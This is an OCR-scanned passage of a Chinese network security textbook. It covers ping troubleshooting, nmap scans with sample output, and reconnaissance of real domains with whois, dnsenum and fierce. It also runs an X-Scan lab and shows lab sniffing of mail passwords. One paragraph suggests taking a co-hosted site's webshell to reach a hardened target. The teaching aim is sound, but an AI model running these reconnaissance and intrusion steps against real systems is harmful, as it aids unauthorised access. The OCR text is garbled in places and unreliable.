网 卡 的 配置 有 问题 ,或 者 网 络 连 线 有 问题 。 

第 4 步 : ping 网 关 IP。 如 果 能 ping 通 ,表示 局 域 网 的 网 关 路 由 器 运行 正常 。 

第 5 步 : ping 远程 IP。 如 果 能 ping 通 , 表 示 默 认 网 关 设 置 正确 。 

第 6 步 : ping localhost, localhost 是 127. 0. 0. 1 的 别名 ,每 台 计 算 机 都 应 该 能 够 将 
localhost 解析 成 127. 0. 0.1。 如 果 不 能 ping i ,说明 在 主机 文件 (C:\Windows\System32\ 
drivers\etc\hosts、/etc/hosts) 中 存在 问题 。 

第 7 步 : ping www. baidu. com。 如 果 不 能 ping 通 , 表 示 DNS 服务 器 的 TP 地 址 配置 错 
误 , 或 者 DNS 服务 器 发 生 了 故障 。 

注意 : 如 果 本 地 计算 机 系统 中 存在 arp 病毒 ,那么 就 不 能 根据 上 面 命令 的 执行 结果 进 
行 正常 .合理 的 判断 了 ,此 时 要 先 清除 arp 病毒 。 

示例 : 想得到 淘宝 域名 对 应 的 IP 地 址 ,ping www. taobao. com 即 可 。 但 是 ,由 于 淘宝 
使 用 了 CDN ,所 以 得 到 的 IP 不 是 真实 Web 服务 器 的 IP 地 址 ,此 时 ,ping taobao. com 即 可 
得 到 真实 Web 服务 器 的 IP 地 址 。 这 是 因为 taobao. com 没有 被 解析 到 CDN 服务 器 上 。 

2. nmap 

nmap(Network Mapper) 是 一 款 开 放 源 代码 的 网 络 探测 和 安全 审核 的 工具 。 它 的 设计 
目标 是 快速 地 扫描 大 型 网 络 , 当 然 用 它 扫描 单个 主机 也 没有 问题 。nmap 以 新 颖 的 方式 使 
用 原始 IP 报 文 来 发 现 网 络 上 有 哪些 主机 ,那些 主机 提供 什么 服务 (应 用 程序 名 和 版 本 ), 那 
些 服 务 运 行 在 什么 操作 系统 (包括 版 本 信息 ), 以 及 许多 其 他 功能 。 虽 然 nmap 通常 用 于 安 
全 审核 ,许多 系统 管理 员 和 网 络 管理 员 也 用 它 来 做 一 些 日 常 的 工作 ,比如 查看 整个 网 络 的 信 
息 ,管理 服务 升级 计划 ,以 及 监视 主机 和 服务 的 运行 。 

nmap 输出 的 是 扫描 目标 的 列表 ,以 及 每 个 目标 的 补充 信息 ,至 于 是 哪些 信息 则 依赖 于 
所 使 用 的 选项 .“ 所 感 兴趣 的 端口 表格 ?是 其 中 的 关键 。 那 张 表 列 出 端口 号 协议、 服务 名 称 
和 状态 。 状 态 可 能 是 open, filtered closed unfiltered, open 意味 着 目标 机 器 上 的 应 用 程序 
正在 该 端口 监听 连接 / 报 文 。filtered 意味 着 防火 墙 \ 过 滤器 或 其 他 网 络 障 碍 阻止 了 该 端口 
被 访问 ,nmap 无 法 得 知 它 是 open 还 是 closed. closed 端口 没有 应 用 程序 在 它 上 面 监 听 , 但 
是 它们 随时 可 能 开放 。 当 端口 对 nmap 的 探测 做 出 响应 ,但 是 nmap 无 法 确定 它们 是 关闭 
还 是 开放 时 ,这 些 端口 就 被 认为 是 unfiltered。 如 果 nmap 报告 状态 组 合 open | filtered 和 
closed | filtered 时 , 那 说 明 nmap 无 法 确定 该 端口 处 于 两 个 状态 中 的 哪 一 个 状态 。 当 要 求 进 
行 版 本 探测 时 ,端口 表 也 可 以 包含 软件 的 版 本 信息 。 当 要 求 进 行 IP 协议 扫描 时 (-sO)， 
nmap 提供 关于 所 支持 的 IP 协议 而 不 是 正在 监听 的 端口 的 信息 。 除 了 所 感 兴 趣 的 端口 表 ， 
nmap 还 能 提供 关于 目标 机 的 进一步 信息 .包括 反 向 域名 ,操作 系统 猜测 设备 类 型 MAC 
地 址 。 

一 个 典型 的 nmap 扫描 如 下 所 示 , 在 这 个 例子 中 ,选项 -A 用 来 进行 操作 系统 及 其 版 本 
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的 探测 ,-T4 可 以 加 快 执行 速度 ,接着 是 目标 主机 名 。 


# nmap -A -T4 192.168.201.135 


Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-13 22:26 CST 

Nmap scan report for 192. 168.201.135 

Host is up (0. 0012s latency). 

Not shown: 994 closed ports 

PORT STATE SERVICE VERSION 

135/tcp open msrpc Microsoft Windows RPC 

139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn 

445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 

1025/tcp open msrpc Microsoft Windows RPC 

3389/tcp open ms-wbt-server Microsoft Terminal Service 

5000/tcp open http-proxy sslstrip 

| http-methods: No Allow or Public header in OPTIONS response (status code 400) 

| http-title: Site doesrt have a title. 

1 service unrecognized despite returning data. If you know the service/version, please submit 
the following fingerprint at https: //nmap. org/cgi-bin/submit.cgi?new-service : 
SF-Port5000-TCP:V = 6.49BETA4 % I = 7 &D = 8/13 % Time = 55CCA92E % P = x86 64-pc-linux-gnu 

SF: % r(GenericLines, 1C, "HTTP/1\. 1\x20400\x20Bad\x20Request\r\n\r\n") % r(GetR 

SF:equest, 1C, "HTTP/1\. 1Nx20400 Vx20Bad V x20Request Vr nV n") % r(RTSPRequest, 1 

SF:C, "HTTP/1\. 1\x20400\x20Bad\x20Request\r\n\r\n") % r( HTTPOptions, 1C, "HTTP/ 
SF:1\.1\x20400\x20Bad\x20Request\r\n\r\n") % r(FourOhFourRequest, 1C, "HTTP/1\ 

SF: . 1\x20400\x20Bad\x20Request\r\n\r\n" ); 

MAC Address: 00:0C:29:7B:BD:E3 (VMware) 

Device type: general purpose 

Running: Microsoft Windows 2000|XP|Me 

OS CPE: cpe:/o: microsoft: windows _ 2000: :- cpe:/o: microsoft: windows _ 2000:: sp2 cpe:/o: 
microsoft:windows 2000::sp4 cpe:/o:microsoft: windows_xp::- cpe:/o: microsoft: windows xp: : 
spl cpe:/o:microsoft:windows_me 

OS details: Microsoft Windows 2000 SP0/SP2/SP4 or Windows XP SP0/SP1, Microsoft Windows 2000 
SP1, Microsoft Windows Millennium Edition (Me) 

Network Distance: 1 hop 

Service Info: OSs: Windows, Windows 98, Windows XP; CPE: cpe:/o: microsoft: windows, cpe:/o: 
microsoft:windows 98, cpe:/o:microsoft:windows xp 


Host script results: 
.nbstat: NetBIOS name: ADMIN-4TB2F85BW, NetBIOS user: —unknown--, NetBIOS MAC: 00:0c:29:7b: 
bd:e3 (VMware) 
smb-os-discovery: 
OS: Windows XP (Windows 2000 LAN Manager) 
OS CPE: cpe:/o:microsoft:windows xp::- 
Computer name: admin-4tb2f85bw 
NetBIOS computer name: ADMIN-4TB2F85BW 
Workgroup: WORKGROUP 
System time: 2015-08-13T22:27:22 * 08:00 
smb-security-mode: 
account used: guest 
authentication level: user 


challenge response: supported 
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|. message signing: disabled (dangerous, but default) 
| smbv2-enabled: Server doesmt support SMBv2 protocol 


TRACEROUTE 
HOP RTT ADDRESS 
1 1.24 ms 192.168.201.135 


OS and Service detection performed. Please report any incorrect results at https://nmap. org/ 

submit/ . 

Nmap done: 1 IP address (1 host up) scanned in 40.12 seconds 

# 

示例 : # nmap -sP 192.168. 201. 100-200 

示例 : # nmap -sP 192. 168. 201. 0/24 

上 面 两 条 命令 使 用 nmap 扫描 网 络 内 存在 多 少 台 在 线 主 机 ,-sP 选项 和 -sn 作用 相同 ,也 
可 以 把 -sP 替换 为 -sn, 其 含义 是 使 用 ping 探测 网 络 中 在 线 主 机 ,不 做 端口 扫描 。 

示例 : # nmap -sS -P0 -sV -O 192. 168. 201. 135 

上 面 这 条 命令 使 用 nmap 获取 远程 主机 的 系统 类 型 及 开放 端口 。 

示例 : # nmap -sT -p 80 -oG - 192. 168. 201. * | grep open 

上 面 这 条 命令 使 用 nmap 列 出 开放 了 指定 端口 的 主机 列表 。 

示例 : # man nmap // 用 命令 查看 nmap 的 详细 帮助 信息 


5.2.5 被 动 信 息 收 集 

被 动 信息 收集 也 就 是 说 不 会 与 目标 服务 器 做 直接 的 交互 、 在 不 被 目标 系统 察觉 的 情况 
下 ,通过 搜索 引擎 .社交 媒体 等 方式 对 目标 外 围 的 信息 进行 收集 ,例如 : 网 站 的 whois 信息 、 
DNS 信息 ,管理 员 以 及 工作 人 员 的 个 人 信息 等 。 

在 互联 网 中 ,有 几 个 公开 的 资源 网 站 可 以 用 来 对 目标 信息 进行 收集 ,使 用 这 些 网 站 , 流 
量 并 不 会 流 经 目标 主机 ,所 以 目标 主机 也 不 会 记录 你 的 行为 。 

1. whois 

当 要 知道 攻击 目标 的 域名 ,首先 要 做 的 就 是 通过 whois 数据 库 查 询 域名 的 注册 信息 ， 
whois 数据 库 是 提供 域名 的 注册 人 信息 ,包括 联系 方式 .管理 员 名 字 、 管 理 员 邮 箱 等 ,其 中 也 
包括 DNS 服务 器 的 信息 。 一 个 域名 的 所 有 者 可 以 通过 查询 whois 数据 库 而 被 找到 。 对 于 
大 多 数 根 域名 服务 器 ,基本 的 whois 由 ICANN 维护 ,而 whois 的 细节 则 由 控制 那个 域 的 域 
注册 机 构 维护 。 在 whois 查询 中 ,通常 注册 人 姓名 和 邮箱 信息 对 于 测试 个 人 站 点 非常 有 用 ， 
因为 我 们 可 以 通过 搜索 引擎 ,社交 网 络 挖掘 出 很 多 域名 所 有 人 的 信息 。 而 对 于 小 站 点 而 言 ， 
域名 所 有 人 往往 就 是 管理 员 。 对 于 大 型 站 点 ,我们 更 关心 DNS 服务 器 ,很 多 公司 都 会 有 自 
己 的 域名 服务 器 ,这 些 服务 器 可 以 成 为 渗透 测试 过 程 中 的 一 个 突破 点 。 

默认 情况 下 ,Kali 已 经 安装 了 whois。 只 需要 输入 要 查询 的 域名 即 可 : 


# whois baidu. com 

可 以 获取 关于 百度 的 DNS 服务 器 信息 ,域名 注册 基本 信息 。 这 些 信 息 在 以 后 的 测试 阶 
段 中 有 可 能 会 发 挥 重 大 的 作用 。 
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除了 使 用 whois 命令 ,也 有 一 些 网 站 提供 在 线 whois 信息 查询 : 


whois. chinaz. com/ 

www. internic. net/whois. html 

2. host 

使 用 DNS 分 析 工 具 的 目的 在 于 收集 有 关 DNS 服务 器 和 测试 目标 的 相应 记录 信息 。 

在 获取 DNS 服务 器 信息 之 后 ,下 一 步 就 是 借助 DNS 服务 器 找 出 目标 主机 IP 地 址 。 可 
以 使 用 如 下 命令 行 工具 来 借助 一 个 DNS 服务 器 查找 目标 主机 的 IP 地 址 : 


# host www. baidu. com // 查 询 详 细 的 记录 只 需要 添加 -a 
#host -a baidu. com 8.8.8.8 // 这 里 8.8.8.8 是 指定 一 个 DNS 服务 器 
# host - t ns baidu. com // fif] ns 记录 

f host - t a baidu. com // 查 询 a 记 录 

# host - t mx baidu. com // 查 询 mx 记录 


因为 host 命令 是 通过 Kali 的 DNS 服务 器 系统 文件 查找 记录 ,该 文件 是 /etc/resolv. 
conf, 可 以 向 里 面 添加 任意 DNS 服务 器 。 也 可 以 像 上 面 命令 一 样 直接 在 命令 行 中 指定 DNS 
服务 器 。 

3. dig 

除了 host 命令 ,也 可 以 使 用 dig 命令 对 DNS 服务 器 进行 挖掘 。 相 对 于 host 命令 ,dig 
命令 更 具有 灵活 和 清晰 的 显示 信息 。 

* dig baidu.com 


4. dnsenum 


# dnsenum baidu. com 
# dnsenum —- enum baidu. com // 对 域 传送 漏洞 进行 了 探测 ,并 且 尝 试 从 谷歌 获取 域名 
# dnsenum - f words. txt xxx. com // 通 过 -上 指定 字典 ,对 目标 域名 的 子 域名 进行 暴力 猜 解 


5. fierce 

fierce 是 使 用 多 种 技术 来 扫描 目标 主机 TP 地 址 和 主机 名 的 一 个 DNS 服务 器 枚 举 工 具 。 
运用 递归 的 方式 来 工作 。 它 的 工作 原理 是 先 通过 查询 本 地 DNS 服务 器 来 查找 目标 DNS 服 
务 器 ,然后 使 用 目标 DNS 服务 器 来 查找 子 域名 。 

# fierce - dns baidu.com - threads 3 // 通 过 fierce 成 功 枚 举 出 某 域名 下 的 子 域名 列表 


6. DMitry 

DMitry( Deepmagic Information Gathering Tool) 是 一 个 一 体 化 的 信息 收集 工具 。 它 可 
以 用 来 收集 的 信息 有 端口 扫描 、whois 主机 IP 和 域名 信息 、 从 Netcraft. com 获取 主机 信息 、 
子 域名 、 域 名 中 包含 的 邮件 地 址 。 尽 管 这 些 信息 可 以 在 Kali 中 通过 多 种 工具 获取 ,但 是 使 
用 DMitry 可 以 将 收集 的 信息 保存 在 一 个 文件 中 .方便 查看 。 


#dmitry — winse baidu. com // 获 取 whois ip、 主 机 信息 、 子 域名 .电子 邮件 
S dmitry - p baidu.com -f -b // 通 过 dmitry 扫描 网 站 端口 
7. 旁 站 查询 


旁 站 也 就 是 和 目标 网 站 处 于 同一 服务 器 的 站 点 ,有 些 情况 下 ,在 对 一 个 网 站 进行 渗透 
12 


时 ,发 现 网 站 安全 性 较 高 , 久 攻 不 下 ,那么 我 们 就 可 以 试 着 从 旁 站 入 手 ,等 拿 到 一 个 旁 站 
webshell 看 是 否 有 权限 跨 目 录 , 如 果 没 有 ,继续 提 权 拿 到 更 高 权限 之 后 回头 对 目标 网 站 进行 
渗透 。 可 以 使 用 在 线 工具 “http://s. tool. chinaz. com/same”, 能 够 得 到 一 些 同 服务 器 的 
站 点 。 

8. Google Hack 

搜索 引擎 是 个 强大 的 东西 ,在 挖掘 信息 时 可 以 使 用 一 些 搜索 引擎 的 语法 ,对 目标 的 信息 
进行 搜集 ,也 会 有 一 些 意 想不到 的 收获 ,可 以 用 来 查找 站 点 敏感 路 径 以 及 后 台地 址 、 查 找 某 
人 信息 ,也 可 以 用 来 搜集 子 域名 等 ,用 处 非常 多 ,只 要 自己 去 构造 搜索 语法 。 


53 实例 : 端口 与 漏洞 扫描 及 网 络 监听 


漏洞 扫描 是 对 计算 机 系统 或 其 他 网 络 设备 进行 与 安全 相关 的 检测 , 找 出 安全 隐患 和 可 
被 黑客 利用 的 漏洞 。 系 统管 理 员 利用 漏洞 扫描 软件 检测 出 系统 漏洞 以 便 有 效 地 防范 黑客 入 
侵 ,然而 黑客 可 以 利用 漏洞 扫描 软件 检测 系统 漏洞 以 利于 入 侵 系 统 。 

注意 : 一 个 端口 就 是 一 扇 进入 计算 机 系统 的 门 。 

l. 漏洞 扫描 与 网 络 监听 

扫描 与 监听 的 实验 环境 如 图 5-2 所 示 。 


2 
E $9 
Windows 2003 Windows XP 


用 Analyzer 监 听 入 侵 者 用 X-Scan-v3.3-en 扫 描 


5-2 实验 环境 


人 侵 者 (192. 168. 10. 5): 运行 X-Scan 对 192. 168. 10. 1 进行 漏洞 扫描 。 

被 和 人 侵 者 (192. 168. 10. 1) : 用 Analyzer 分 析 进 来 的 数据 包 , 判 断 是 否 遭 到 扫描 攻击 。 

第 1 步 : 入 侵 者 启动 X-Scan, 设 置 参数 。 安 装 好 X-Scan 后 ,有 两 个 运行 程序 : xscann. 
exe 和 Xscan gui.exe, xscann. exe 是 扫描 器 的 控制 台 版 本 ,xscan_gui. exe 是 扫描 器 的 窗 口 
版 本 。 

在 此 运行 窗口 版 本 (xscan_gui. exe) ,如 图 5-3 所 示 。 单 击 工具 栏 最 左边 的 “设置 扫描 参 
数 ” 按 钮 ,进行 相关 参数 的 设置 ,比如 扫描 范围 的 设 定 ,xscanner 可 以 支持 对 多 个 IP 地 址 的 
扫描 ,即使 用 者 可 以 利用 xscanner 成 批 扫 描 多 个 IP 地 址 ,例如 在 IP 地 址 范围 内 输入 
192. 168. 0. 1~192. 168. 0.255。 如 果 只 输入 一 个 IP 地 址 ,扫描 程序 将 针对 单独 的 IP 地 址 
进行 扫描 ,在 此 输入 192. 168. 10. 1 。 

第 2 步 : 入 侵 者 进行 漏洞 扫描 。 如 图 5-3 所 示 , 单 击 工具 栏 左边 第 二 个 按钮 , 即 三 角形 
按钮 ,进行 漏洞 扫描 。 

X-Scanner 集成 了 多 种 扫描 功能 于 一 身 , 它 可 以 采用 多 线程 方式 对 指定 IP 地 址 段 (或 
独立 IP 地址) 进行 安全 漏洞 扫描 ,扫描 内 容 包括 标准 端口 状态 及 端口 banner 信息 .CGI 漏 
ill. RPC 漏洞 、 SQL-Server 默认 账户 .FTP 弱 口 令 、NT 主机 共享 信息 .用 户 信息 、 组 信息 、 
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指定 IF 范围 : 
haz. 168. 10.1 


omes | 


图 5-3 启动 X-Scan 并 设置 参数 


NT 主机 弱 口 令 用 户 等 。 因 为 结果 比较 多 ,通过 控制 台 很 难 阅读 ,这 个 时 候 xscanner 会 在 
log 下 生成 多 个 html 的 中 文 说 明 ,阅读 这 些 文档 比较 方便 。 对 于 一 些 已 知 的 CGI 和 RPC 
漏洞 ,X-Scanner 给 出 了 相应 的 漏洞 描述 、 利 用 程序 及 解决 方案 。 

第 3 步 : 入 侵 者 扫描 结果 。 如 图 5-4 所 示 ,“ 普 通信 息 ” 标 签 页 显示 漏洞 扫描 过 程 中 的 信 
息 ,“ 漏 洞 信 息 ” 标 签 页 显示 可 能 存在 的 漏洞 ,比如 终端 服务 (端口 3389) 的 运行 ,就 为 黑客 提 
供 了 很 好 的 入 侵 通 道 。 

第 4 步 : 被 入侵 者 网 络 监听 。 由 于 Analyzer 3.0al2 在 Windows 2003 SP2 下 不 能 正常 
运行 (在 Windows XP SP2 下 可 以 正常 运行 ) ,因此 选用 以 前 的 版 本 Analyzer 2. 2 进行 测试 ， 
读者 可 以 在 http://analyzer. polito. it/ download. htm 下 载 。 

在 入 侵 者 运行 xscan_gui. exe 之 前 ,被 人 侵 者 运行 Analyzer。 在 人 侵 者 运行 xscan_gui. 
exe 漏洞 扫描 结束 后 ,停止 Analyzer 的 抓 包 , 然 后 分 析 Analyzer 抓获 的 数据 包 , 如 图 5-5 所 
示 , 对 从 192. 168. 10. 5 发 来 的 数据 包 进 行 分 析 , 可 知 192. 168. 10. 5 对 192. 168. 10. 1 进行 
了 端口 和 漏洞 扫描 。 

2. 扫描 器 的 组 成 

扫描 器 一 般 是 由 用 户 界 面 、 扫 描 引擎 .扫描 方法 集 .漏洞 数据 库 .扫描 输出 报告 等 模块 组 
成 。 整 个 扫描 过 程 由 用 户 界面 驱动 ,首先 由 用 户 建立 新 会 话 , 选 定 扫描 策略 ,启动 扫描 引擎 ， 
然后 根据 用 户 制订 的 扫描 策略 ,扫描 引擎 开始 调度 扫描 方法 .扫描 方法 根据 漏洞 数据 库 中 的 
漏洞 信息 对 目标 系统 进行 扫描 ,最 后 由 报告 模块 组 织 扫 描 结 果 并 输出 。 

扫描 器 的 关键 是 要 有 一 个 组 织 良 好 的 漏洞 数据 库 和 相应 的 扫描 方法 集 。 漏 洞 数据 库 是 
核心 ,一般 含 漏洞 编号 分 类 、 受 影响 系统 漏洞 描述 、 修 补 方法 等 内 容 。 扫 描 方法 集 则 要 根 
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图 5-4 扫描 结果 
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据 漏洞 描述 内 容 , 提 取出 漏洞 的 主要 特征 ,进一步 转化 出 检测 这 个 漏洞 的 方法 ,这 是 一 个 技 
术 实 现 的 过 程 。 

漏洞 数据 库 的 建立 需要 一 大 批 安 全 专家 和 技术 人 员 长 期 协同 工作 ,目前 国内 外 都 有 相 
应 的 组 织 开 展 这 方面 的 工作 ,最 具 影 响 力 的 就 是 CVE (Common Vulnerabilites and 
Exposures) 。 由 于 新 的 漏洞 层出不穷 ,所 以 必须 时 刻 注 意 漏洞 数据 库 和 检测 方法 集 的 更 新 。 

3. 漏洞 

漏洞 一 词 是 从 英文 单词 Vulnerability 翻译 而 来 ,Vulnerability 应 译 为 “脆弱 性 ”, 但 是 
中 国 的 技术 人 员 已 经 更 愿意 接受 “漏洞 (Hole)” 这 一 通俗 化 的 名 词 。 

漏洞 是 指 系统 硬件 或 者 软件 存在 某 种 形式 的 安全 方面 的 脆弱 性 ,从 而 使 得 攻击 者 能 够 
在 未 授权 的 情况 下 访问 .控制 系统 。 大 多 数 的 漏洞 体现 在 软件 系统 中 ,如 操作 系统 软件 、 网 
络 服务 软件 .各 类 应 用 软件 和 数据 库 系 统 及 其 应 用 系统 (如 Web) 等 。 

在 任何 程序 设计 中 都 无 法 绝对 避免 人 为 疏忽 ,黑客 正 是 利用 种 种 漏洞 对 网 络 进行 攻击 ， 
黑客 利用 漏洞 完成 各 种 攻击 是 最 终 的 结果 ,但 是 对 黑客 的 真正 定义 应 该 是 “寻找 漏洞 的 人 ”， 
他 们 不 是 以 攻击 网 络 为 乐趣 ,而 是 沉迷 于 阅读 他 人 程序 并 力图 找到 其 中 的 漏洞 。 从 某 种 程 
度 上 来 说 ,黑客 都 是 "好 人 ”, 他 们 为 了 追求 完善 ,为 了 建立 安全 的 互联 网 。 不 过 现在 有 很 多 
的 伪 黑 客 经 常 利 用 漏洞 做 些 违法 的 事情 。 

由 于 漏洞 对 系统 的 威胁 体现 在 恶意 攻击 行为 对 系统 的 威胁 ,只 要 利用 硬件 、 软 件 和 策略 
上 最 薄弱 的 环节 ,恶意 攻击 者 就 可 以 得 手 。 因 此 漏洞 的 危害 可 以 简单 地 用 * 木 桶 原则 ?加 以 
说 明 : 一 个 木 桶 能 盛 多 少 水 ,不 在 于 组 成 它 的 最 长 的 那 根木 料 ,而 取决 于 最 短 的 那 一 根 。 同 
样 对 于 一 个 信息 系统 来 说 , 它 的 安全 性 不 在 于 它 是 否 采用 了 最 新 的 加 密 算法 或 最 先进 的 设 
备 ,而 是 由 系统 本 身 最 薄弱 之 处 决定 。 

4. 端口 扫描 

CD 端口 扫描 的 定义 。 端 口 扫 描 是 通过 TCP 或 UDP 的 连接 来 判断 目标 主机 上 是 否 有 
相关 的 服务 正在 运行 并 且 进 行 监听 。 比 如 使 用 端口 扫描 器 Advanced Port Scanner 对 某 网 
段 进 行 扫描 ,结果 如 图 5-6 所 示 。 

(2) 端口 。 端 口 在 计算 机 网 络 领域 中 是 个 非常 重要 的 概念 , 它 是 专门 为 计算 机 通信 而 
设计 的 , 它 是 由 计算 机 的 通信 协议 TCP/IP 定义 的 。 其 中 规定 ,用 IP 地 址 和 端口 作为 套 接 
字 , 它 代表 TCP 连接 的 一 个 连接 端 , 一 般 称 为 Socket。 具 体 来 说 ,就 是 用 [IP: 端 口 ] 来 定位 
一 台 主 机 中 的 某 个 进程 ,目的 是 让 两 台 计 算 机 能 够 找到 对 方 的 进程 。 可 见 .端口 与 进程 是 一 
一 对 应 的 关系 ,如果 某 个 进程 正在 等 待 连接 , 则 称 该 进程 正在 监听 ,那么 就 会 出 现 与 该 进程 
相对 应 的 端口 。 由 此 可 见 , 入 侵 者 通过 扫描 端口 .就 可 以 判断 目标 计算 机 有 哪些 服务 进程 正 

(D 端口 的 分 类 。 端 口 一 般 分 为 两 类 : 熟知 端口 和 一 般 端 口 。 

熟知 端口 (公认 端口 ): 由 ICANN( 互 联网 指派 名 字 和 号 码 公 司 ) 负 责 分 配给 一 些 常用 
的 应 用 层 服务 程序 固定 使 用 的 端口 ,其 值 一 般 为 0 一 1023 。 

一 般 端口 : 用 来 随时 分 配给 请 求 通信 的 客户 进程 ,其 值 一 般 大 于 1023 。 

(4) 端口 扫描 。 端 口 扫描 是 指 对 目标 计算 机 的 所 有 或 者 需要 扫描 的 端口 发 送 特定 的 数 
据 包 ,然后 根据 返回 的 信息 来 分 析 目 标 计 算 机 的 端口 是 否 打 开 、 是 否 可 用 。 

端口 扫描 行为 的 一 个 重要 特征 是 : 在 短 时 期 内 有 很 多 来 自 相同 的 信 源 IP 地 址 的 数据 
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5-6 用 Advanced Port Scanner 对 某 网 段 进行 扫描 


包 发 往 同 一 IP 地 址 的 不 同 端口 或 不 同 IP 地 址 的 不 同 端口 。 

G) 端口 扫描 器 。 端 口 扫描 器 是 一 种 自动 检测 远程 或 本 地 计算 机 安全 性 弱点 的 程序 ， 
通过 使 用 扫描 器 可 以 不 留 痕迹 地 发 现 远程 主机 提供 了 哪些 服务 及 版 本 ,进而 可 以 了 解 到 远 
程 计算 机 存在 的 安全 问题 。 

注意 : 端口 扫描 器 不 是 直接 攻击 网 络 漏洞 的 程序 ,只 是 能 够 帮助 发 现 目标 主机 的 某 些 
安全 弱点 。 

端口 扫描 器 在 扫描 过 程 中 主要 具有 以 下 3 个 方面 的 能 力 。 

O 识别 目标 系统 上 正在 运行 的 TCP/UDP 协议 服务 。 

@ 识别 目标 系统 的 操作 系统 类 型 。 

O 识别 某 个 应 用 程序 或 某 个 特定 服务 的 版 本 号 。 

(6) 端口 扫描 的 类 型 。 端 口 扫 描 的 类 型 有 多 种 ,比如 TCPconnect Offi, SYN 扫描 、 
SYN/ACK 扫描 、FIN 扫描 、XMAS 扫描 ,NULL 扫描 、RESET 扫描 和 UDP 扫描 ,在 此 仅 介 
绍 TCPconnect() 扫 描 、SYN 扫描 和 UDP 扫描。 

(D TCPconnect() 扫 描 。 如 图 5-7 所 示 ,TCPconnect() 扫 描 使 用 TCP 连接 建立 的 “三 次 
握手 "机制, 建立 一 个 到 目标 主机 某 端 口 的 连接 。 

a. 扫描 者 将 SYN 数据 包 发 往 目标 主机 的 某 端 口 。 

b. 扫描 者 等 待 目标 主机 响应 数据 包 , 如 果 收 到 SYN/ACK 数据 包 , 说 明 目 标 端口 正在 
监听 ,如 果 收 到 RST/ACK 数据 包 , 说 明 目 标 端口 不 处 于 监听 状态 ,连接 被 复位 。 如 果 端 口 
是 处 于 非 活 动 状态 ,服务 器 将 会 发 送 RESET 数据 包 , 这 将 会 重 置 与 客户 端的 连接 。 

c. 当 扫描 者 收 到 SYN/ACK 数据 包 后 ,接着 发 送 ACK 数据 包 完 成 “三 次 握手 ”。 
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Syn Syn 
Syn/Ack| OR !RsUAcK SymAck] OR [RsVAcK 
q= —— Ws 
被 扫描 者 扫描 者 被 扫描 者 扫描 者 
TCPconnect( ) 扫 描 半 开 放 式 扫描 (TCP 的 SYN 扫 描 ) 


图 5-7 TCPconnect() 扫 描 、SYN 扫描 (1) 


d. 当 整 个 连接 过 程 完成 后 ,结束 连接 。 

这 种 扫描 容易 被 发 现 ,目标 主机 的 日 志文 件 会 记录 大 量 一 连接 就 断 开 的 信息 。 所 以 出 
HT SYN 扫描 。 

© SYN 扫描 。 如 图 5-7 所 示 ,TCP 的 SYN 扫描 不 同 于 TCPconnect() 扫 描 , 因 为 并 不 
建立 一 个 完整 的 TCP 连接 。 只 是 发 送 一 个 SYN 数据 包 去 建立 一 个 “三 次 握手 ”过 程 ,等 待 
被 扫描 者 的 响应 ,如 果 收 到 SYN/ACK 数据 包 , 则 清楚 地 表明 目标 端口 处 于 监听 状态 ,如 果 
收 到 的 是 RST/ACK 数据 包 , 则 表明 目标 端口 处 于 非 监听 状态 。 然 后 发 送 RESET 数据 包 ， 
因为 没有 建立 完整 的 连接 过 程 ,目标 主机 的 日 志文 件 中 不 会 有 这 种 尝试 扫描 的 记录 。 

© UDP 扫描 。UDP 扫描 基础 是 向 一 个 关闭 的 UDP 端口 发 送 数据 时 会 得 到 ICMP 
PORT Unreachable 消息 响应 ,如果 向 目标 主机 发 送 UDP 数据 包 , 没 有 收 到 ICMP PORT 
Unreachable 消息 ,那么 可 以 假设 这 个 端口 是 开放 的 。 

UDP 扫描 不 太 可 靠 , 原 因 有 : 当 UDP 包 在 网 上 传输 时 ,路 由 器 可 能 会 将 它们 抛弃 ; 多 
数 UDP 服务 在 被 探测 到 时 并 不 做 出 响应 ; 防火 墙 通常 配置 为 抛弃 UDP 包 (DNS 除 
外 ,53 端口 )。 

CD 端口 扫描 器 的 类 型 。 目 前 端口 扫描 器 主要 有 两 类 : 主机 扫描 器 和 网 络 扫 描 器 。 

a 主机 扫描 器 。 主 机 扫描 器 又 称 本 地 扫描 器 , 它 与 待 检 查 系统 运行 于 同一 结 点 ,执行 
对 自身 的 检查 。 它 的 主要 功能 为 分 析 各 种 系统 文件 内 容 ,查找 可 能 存在 的 对 系统 安全 造成 
威胁 的 漏洞 或 配置 错误 。 由 于 主机 扫描 器 实际 上 是 运行 于 目标 主机 上 的 进程 ,因此 具有 以 

a. 为 了 运行 某 些 程序 ,检测 缓冲 区 溢出 攻击 ,要求 扫描 器 可 以 在 系统 上 任意 创建 进程 。 

b. 可 以 检查 到 安全 补丁 一 级 ,以 确保 系统 安装 了 最 新 的 安全 补丁 。 

c. 可 以 查看 本 地 系统 配置 文件 ,检查 系统 的 配置 错误 。 

除非 能 攻 入 系统 并 取得 超级 用 户 (管理 员 ) 权 限 , 或 者 主机 本 身 已 赋 也 网 络 扫 描 器 的 检 
查 权限 ,否则 网 络 扫 描 器 很 难 实现 以 上 功能 ,所 以 主机 扫描 器 可 以 检查 出 许多 网 络 扫 描 器 检 
查 不 出 的 问题 。 

@ 网 络 扫描 器 。 网 络 扫描 器 又 称 远 程 扫 描 器 ,通过 网 络 远程 探测 目标 结 点 ,检查 安全 
漏洞 。 与 主机 扫描 器 的 扫描 方法 不 同 ,网络 扫描 器 通过 执行 一 整套 综合 的 扫描 方法 集 ,发 送 
精心 构造 的 数据 包 来 检测 目标 系统 是 否 存在 安全 隐患 。 

5. 网 络 监听 及 其 原理 

CD 网 络 监 听 获 得 邮箱 的 用 户 名 和 密码 。 在 Windows XP SP2 上 运行 Analyzer 3. 0al2 
进行 测试 。 先 运行 Analyzer 3. 0al12 ,再 使 用 Outlook Express 或 者 Foxmail 收发 邮件 ,然后 

127 


p eMe 第 2 版 ) 


分 析 Analyzer 抓获 的 数据 包 . 如 图 5-8 和 图 5-9 所 示 , 可 以 看 到 邮箱 的 用 户 名 和 密码 
(被 隐藏 ) 。 
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图 5-9 TCPconnect() 扫 描 、SYN 扫描 (3) 


注意 : 本 实验 虽然 是 在 同一 台 计 算 机 上 进行 的 ,但 是 不 影响 网 络 监听 的 实质 。 在 此 主 
要 介绍 网 络 监听 软件 的 使 用 以 及 对 截获 数据 包 的 分 析 。 

(2) 网 络 监听 原理 。 以 太 网 的 工作 方式 是 将 数据 包 发 送 到 同一 网 段 ( 共 享 式 网 络 ) 所 有 
